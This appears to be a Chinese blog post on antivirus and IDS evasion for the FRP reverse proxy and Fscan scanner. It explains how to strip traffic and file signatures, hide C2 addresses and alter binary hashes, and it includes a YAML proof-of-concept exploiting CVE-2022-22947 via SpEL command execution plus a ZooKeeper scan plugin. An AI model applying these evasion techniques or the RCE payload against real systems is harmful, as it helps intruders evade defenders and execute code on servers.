免杀对抗&Go魔改二开&Fscan扫描&FRP代理

nihao6666hhhhh

已于 2024-04-10 10:18:29 修改

阅读量1.1k

点赞数 19

文章标签：安全 golang 哈希算法免杀网络安全

于 2024-04-09 14:30:04 首次发布

本文链接：https://blog.csdn.net/qq_45087791/article/details/137536641

版权

安全工具-Goland-FRP魔改二开-特征消除

在渗透测试过程中，有后渗透需求时，需要进行反向代理，最早接触的是frp工具，但是在使用过程当中会有配置文件落地，如果忘记删除的情况下容易被溯源C2地址。针对这种情况可以将配置文件的参数值写死在代码里，也可以写成接收参数的方式，或者写成接收密文的方式来避免直接被找到C2地址。官方版本的frp在默认配置传输过程中有一些明显的特征，在如今多种安全设备防护的内网会遭受到识别和拦截，如果不进行去除特征或者进行加密传输的话很可能会被设备拦截掉。针对这种情况，我们要进行了一些基本的参数测试和特征去除。
项目地址：https://github.com/fatedier/frp
0、打包编译：(在kali上编译不会出错)

make -f Makefile.cross-compiles

1、参数混淆

tls_enable = true
use_encryption = true
use_compression = true

2、基本特征
https://mp.weixin.qq.com/s/Dv2rO31T4SxCpnual5Saxw
改传参及源ip：

pkg/msg/msg.go

Login
StartWorkConn

改tls首字节：

pkg/util/net/tls.go

改var FRPTLSHeadByte=0x17

改版本：

pkg/util/version/version.go

var version='0.99.0

3、流量特征

https://mp.weixin.qq.com/s/lab43p7Xh_OR7jlUIlA1xg

4、EXE处理
加资源和签名打乱匹配hash值特征

安全工具-Goland-FScan魔改二开-特征消除

Fscan是一款优秀的内网综合扫描工具，方便一键自动化、全方位漏扫扫描。在落地使用过程中流量及文件不修改的情况下基本被检测查杀，针对这种情况，我们要进行了一些基本的参数测试和特征去除外加功能拓展。
项目地址：https://github.com/shadow1ng/fscan
=>>源码解析

1、源码目录结构
2、目录对应功能
3、功能对应修改

=>>直接编译(匹配hash值)
https://github.com/shadow1ng/fscan

go build -ldflags="-s -w " -trimpath main.go

=>>DLL加载调用（加载改变）
main.go加入被调用init方法

gcc -o fscan_loader_c.exe main.c
go build -buildmode=c-shared -o fscan.dll ./main.go

=>>功能添加新POC
Yaml语法-案例-Vulhub
https://vulhub.org/#/environments/spring/CVE-2022-22947/
参考：https://github.com/chaosec2021/fscan-POC

name: poc-yaml-CVE-2022-22947
rules:

method: POST
path: /actuator/gateway/routes/hacktest
headers:
Content-Type: application/json
body:
{
“id”: “hacktest”,
“filters”: [ {
“name”: “AddResponseHeader”,
“args”: {
“name”: “Result”,
“value”: “#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{“id”}).getInputStream()))}”
}
} ],
“uri”: “http://example.com”
}
expression: |
response.status == 201
detail:
author: xiaodisec
links:
- https://www.xiaodi8.com

=>>功能添加扫描项
1、创建Plugins/zookeeper.go

package Plugins
import (
“fmt”
“github.com/samuel/go-zookeeper/zk”
“github.com/wjlin0/fscan/common”
“time”
)
func ZookeeperConn(info common.HostInfo) {
x := fmt.Sprintf(“%s:%v”, info.Host, info.Ports)
s := []string{x}
_, _, err := zk.Connect(s, time.Second5)
//defer conn.Close()
if err != nil {
fmt.Println(err)
} else {
common.LogSuccess(fmt.Sprintf(“unauthorized zookeeper %s”, fmt.Sprintf(“%v:%v”, info.Host, info.Ports)))
//fmt.Println(“zookeeper 连接成功！”)
}
}

2、添加Plugins/base.go

“2181”: ZookeeperConn,

3、添加common/config.go

“zooker”: 2181,
“zooker”: “2181”,

4、编译打包运行测试
非web扫描开发

1、将扫描的端口服务对应写到config.go
2、base.go去写上端口击对应执行的函数
3、新建文件写函数利用代码

web扫描开发：

pocs目录下 yaml语法保持和它官方一致即可

nihao6666hhhhh

关注

19
点赞
踩
7

收藏

觉得还不错? 一键收藏
0
评论
免杀对抗&Go魔改二开&Fscan扫描&FRP代理

在渗透测试过程中，有后渗透需求时，需要进行反向代理，最早接触的是frp工具，但是在使用过程当中会有配置文件落地，如果忘记删除的情况下容易被溯源C2地址。官方版本的frp在默认配置传输过程中有一些明显的特征，在如今多种安全设备防护的内网会遭受到识别和拦截，如果不进行去除特征或者进行加密传输的话很可能会被设备拦截掉。在落地使用过程中流量及文件不修改的情况下基本被检测查杀，针对这种情况，我们要进行了一些基本的参数测试和特征去除外加功能拓展。=>>直接编译(匹配hash值)=>>功能添加扫描项。
复制链接

扫一扫